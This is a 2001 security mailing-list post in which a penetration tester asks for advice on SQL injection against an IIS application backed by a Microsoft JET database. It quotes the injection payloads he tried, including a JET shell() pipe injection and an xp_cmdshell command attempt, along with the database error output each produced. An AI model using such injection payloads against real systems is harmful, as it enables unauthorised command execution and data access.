JET sql help please anyone

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Fri Nov 30 2001 - 04:07:14 PST

    hello all,

    I am performing a pen test against a IIS server which uses Microsoft jet to
    contact a database. I tried the usual stuff such as ' in the various fields
    and received a promising error

    Microsoft JET Database Engine error '80040e14'
    Syntax error in string in query expression '((User.UserCurrent)=True) AND
    (User.UserId = ''') ORDER BY user.Name'.

    /blah/blahbalh/search.asp, line 66

    And then tried

    ')OR |shell("dir")|;

    and got

    Microsoft JET Database Engine error '80040e14'
    Invalid use of vertical bars in query expression '((user.userCurrent)=True)
    AND (user.userId = '')OR |shell("dir")|'.

    /blah/blahbalh/search.asp, line 66

    So i tried

    admin' ); master..xp_cmdshell("dir");--

    And received

    Microsoft JET Database Engine error '80040e14'
    Characters found after end of SQL statement.

    /blah/blahbalh/search.asp, line 66

    various other errors occurred during the test such as

    Microsoft JET Database Engine error '80040e14'
    Invalid SQL statement; expected 'DELETE', 'INSERT', 'PROCEDURE', 'SELECT',
    or 'UPDATE'.

    Any ideas?

    Regards,
    Gary

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/